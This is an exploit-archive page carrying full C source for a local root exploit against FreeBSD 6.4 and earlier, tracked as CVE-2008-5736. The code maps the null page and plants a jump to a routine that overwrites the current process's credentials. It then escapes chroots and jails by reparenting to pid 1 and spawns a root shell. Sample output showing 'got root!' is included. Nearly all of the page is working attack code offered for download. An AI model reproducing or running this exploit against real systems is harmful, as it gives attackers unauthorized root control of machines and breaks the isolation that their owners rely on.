what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

FreeBSD 6.4 Netgraph Privilege Escalation

FreeBSD 6.4 Netgraph Privilege Escalation
Posted Mar 10, 2011
Authored by zx2c4

FreeBSD versions 6.4 and below Netgraph local privilege escalation exploit.

tags | exploit, local
systems | freebsd
advisories | CVE-2008-5736
SHA-256 | f9bec532885df70ffa4f6568914b356999d9c3d3c17fd766a1248a5b0e06d65d

FreeBSD 6.4 Netgraph Privilege Escalation

Change Mirror Download
/*
* FreeBSD <= 6.4-RELEASE Netgraph Exploit
* by zx2c4
*
*
* This is an exploit for CVE-2008-5736, the FreeBSD protosw
* and loosely based on Don Bailey's 2008 exploit -
* http://www.exploit-db.com/exploits/7581/ . The thing with
* Don's exploit is that it relies on having a known location
* of allproc, which means having access to the kernel or
* debugging symbols, either of which might not be available.
* Initial attempts included a general memory search for some
* characteristics of allproc, but this was difficult to make
* reliable. This solution here is a much more standard - get
* the current thread, change its permissions, and execl to
* shell. Additionally, it breaks out of chroots and freebsd
* jails by reparenting to pid 1 and copying its fds.
*
* This reliably works on kernels on or below 6.4-RELEASE:
*
* $ gcc a.c
* $ ./a.out
* ~ FreeBSD <= 6.4-RELEASE Netgraph Exploit ~
* ~~~~~~~~~~~~~~~~~ by zx2c4 ~~~~~~~~~~~~~~~~
* ~~~~~ greetz to don bailey, edemveiss ~~~~~
*
* [+] mmapping null page
* [+] adding jmp to pwnage in null page
* [+] opening netgraph socket
* [+] triggering null dereference
* [+] elevating permissions
* [+] got root!
* #
*
* It's an oldie, but simple enough that someone needed
* to write another PoC exploit at some point.
*
* cheers,
* zx2c4, 27-2-2011
*
*/

#define _KERNEL
#include <sys/types.h>
#include <sys/time.h>
#include <sys/param.h>
#include <sys/proc.h>
#include <sys/ucred.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/filedesc.h>
#include <sys/queue.h>
#include <netgraph/ng_socket.h>
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>

#define PAGES 1


volatile int got_root = 0;
int root(void)
{
struct thread *thread;
asm(
"movl %%fs:0, %0"
: "=r"(thread)
);
thread->td_critnest = 0;
thread->td_proc->p_ucred->cr_uid = 0;
thread->td_proc->p_ucred->cr_prison = NULL;

struct proc *parent = thread->td_proc;
while (parent->p_pptr && parent->p_pid != 1)
parent = parent->p_pptr;
thread->td_proc->p_fd->fd_rdir = parent->p_fd->fd_rdir;
thread->td_proc->p_fd->fd_jdir = parent->p_fd->fd_jdir;
thread->td_proc->p_fd->fd_cdir = parent->p_fd->fd_cdir;
thread->td_proc->p_pptr = parent;

got_root = 1;
return 0;
}

int main(int argc, char *argv[])
{
printf("~ FreeBSD <= 6.4-RELEASE Netgraph Exploit ~\n");
printf("~~~~~~~~~~~~~~~~~ by zx2c4 ~~~~~~~~~~~~~~~~\n");
printf("~~~~~ greetz to don bailey, edemveiss ~~~~~\n\n");

printf("[+] mmapping null page\n");
if (mmap(NULL, PAGES * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_FIXED, -1, 0) < 0) {
perror("[-] mmap failed");
return -1;
}

printf("[+] adding jmp to pwnage in null page\n");
*(char*)0x0 = 0x90;
*(char*)0x1 = 0xe9;
*(unsigned long*)0x2 = (unsigned long)&root;

printf("[+] opening netgraph socket\n");
int s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
if (s < 0) {
perror("[-] failed to open netgraph socket");
return -1;
}

printf("[+] triggering null dereference\n");
shutdown(s, SHUT_RDWR);

if (!got_root) {
printf("[-] failed to trigger pwnage\n");
return -1;
}

printf("[+] elevating permissions\n");
setuid(0);
setgid(0);
if (getuid() != 0) {
printf("[-] failed to get root\n");
return -1;
}

printf("[+] got root!\n");
execl("/bin/sh", "sh", NULL);

return 0;
}

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close